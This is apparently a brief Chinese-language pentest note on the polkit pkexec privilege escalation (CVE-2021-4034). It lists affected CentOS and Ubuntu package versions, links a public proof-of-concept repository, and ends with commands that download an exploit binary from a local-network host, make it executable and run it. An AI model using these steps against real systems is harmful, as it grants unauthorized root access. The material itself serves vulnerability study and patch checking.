1.漏洞介绍
polkit 是一个授权管理器,其系统架构由授权和身份验证代理组成,pkexec是其中polkit的其中一个工具,他的作用有点类似于 sudo ,允许用户以另一个用户身份执行命令
1.1影响版本
1
2
3
4
5
6
7
8
9
10
11
12
| CentOS 6<polkit-0.96-11.el6_10.2
CentOS 7<polkit-0.112-26.el7_9.1
CentOS 8.0<polkit-0.115-13.el8_5.1
CentOS 8.2<polkit-0.115-11.el8_2.2
CentOS 8.4<polkit-0.115-11.el8_4.2
Ubuntu 21.10 (Impish Indri) < Released (0.105-31ubuntu0.1)
Ubuntu 21.04 (Hirsute Hippo) Ignored (reached end-of-life)
Ubuntu 20.04 LTS (Focal Fossa) < Released (0.105-26ubuntu1.2)
Ubuntu 18.04 LTS (Bionic Beaver) < Released (0.105-20ubuntu0.18.04.6)
Ubuntu 16.04 ESM (Xenial Xerus) < Released (0.105-14.1ubuntu0.5+esm1)
Ubuntu 14.04 ESM (Trusty Tahr) < Released (0.105-4ubuntu3.14.04.6+esm1)
|
1.2exp在线与利用
1
| https://github.com/dzonerzy/poc-cve-2021-4034
|
1
2
3
| wget http://192.168.3.108:8000/exploit
chmod +x exploit
./exploit
|
